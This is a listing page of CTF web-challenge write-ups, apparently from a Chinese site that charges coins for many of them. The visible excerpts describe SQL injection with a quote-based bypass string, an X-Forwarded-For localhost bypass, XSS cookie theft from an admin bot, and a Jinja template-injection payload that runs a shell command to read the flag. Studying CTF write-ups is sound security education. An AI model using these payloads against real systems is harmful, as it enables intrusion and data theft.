-
BYUCTF 2024 Argument WP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- WEB
- 2天前
-
crator_judge_writeup(AI)
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
5 金币
- WEB
- 6天前
-
HackINI 2023 - Calling Convention 32PWN的超详细wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 12天前
-
Zombie-401的超详细wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
5 金币
- WEB
- 12天前
-
HackINI HEADache的超级超级详细wp
HackINIHEADache题目信息题型:Web赛事:HackINICTFURL:http://49.232.142.230:15857(或:16879)题目分析页面提示"ifyouwanttheflagjustaskforitpolitely",挑战名"HEADache"暗示与HTTPHeaders相关。解题步骤访问页面,发现只允许GET/HEAD/OPTIONS方法提示"askforitpo...
- WEB
- 13天前
-
zombie-201 (Web)的详细wp
zombie-201(Web)题目信息题型:Web场景:http://49.232.142.230:10423Flag:wctf{h1dd3n-c00k135-d1d-n07-h31p-373964}考点XSS(输入反射,无过滤)HttpOnlycookie绕过/debug端点泄露请求头(含cookie)Zombie.jsheadlessbrowserbot解题过程1.信息收集GET/→静态首页,...
- WEB
- 13天前
-
账密泄露追踪.2
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 14天前
-
charlottesweb的详细writeup
题目信息题目名称:charlottesweb题目类型:WebURL:http://49.232.142.230:17616Flag格式:wctf{}难度:Easy考点分析HTTP方法绕过:FLAG端点只接受PUT方法,GET/POST请求返回404源码泄露:HTML注释泄露/src路径,获取完整Flask源码Web侦察:页面隐藏信息收集解题思路1.信息收集访问首页,查看HTML源码发现注释:<...
- WEB
- 14天前
-
Zombie-101的详细WP
#Zombie-101Writeup##题目信息-**题目名称**:zombie-101-**题目类型**:Web-**URL**:http://49.232.142.230:14391-**Flag格式**:wctf{}-**难度**:Easy##考点分析-**XSS(Cross-SiteScripting)**:通过反射型XSS窃取AdminBot的Cookie-**AdminBot模拟**:...
- WEB
- 14天前
-
HackINI-2021 my-first-sqli
本题为SQL注入攻击的典型场景SQL语句拼接漏洞登录界面的后端代码直接将用户输入的用户名和密码拼接到SQL查询语句中,没有做任何安全校验和参数化处理。原本的查询语句应该是:SELECT*FROMUSERSWHEREusername='admin'ANDpassword='正确密码'2.恶意语句的构造逻辑:用户输入的admin'or'1'='1'--会和原语句拼接成:SELECT*FROMUSE...
- WEB
- 1月前
-
HackINI-2021 post-the-get
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1月前
-
HackINI-2021 inspect-me
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1月前
-
JW token
进入网页后,右键,点击检查,找到应用程序,获得token;进入https://www.jwt.io/解密
- WEB
- 1月前
-
0xGame 2020 jwt
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 2月前
-
Bugku_Outsiders
F12HackBarLoadURLAddHeaderx-forwarded-for:127.0.0.1Execute,得到Flag:Icangivetheflagtomyself,right?N0PS{XF0rw4Rd3D}
- WEB
- 3月前
-
Bugku_CaaS
Payloadname={{g.pop["global""s"].builtins.eval(request.form.team_name)}}&team_name=import("os").popen("catflag.txt").read()屏幕输出Haha!Nocertificateforn00bz{5571_57r1k3s_4g41n_7a1b3f4e5d}
- WEB
- 3月前
-
hellogate
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- WEB
- 3月前
-
Securinets>Friendly-2022>Cr4zy-Js0N
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 4月前
-
TJCTF >2022>fruit-store
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 4月前
-
[UMDCTF 2023]pop-calc
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 6月前
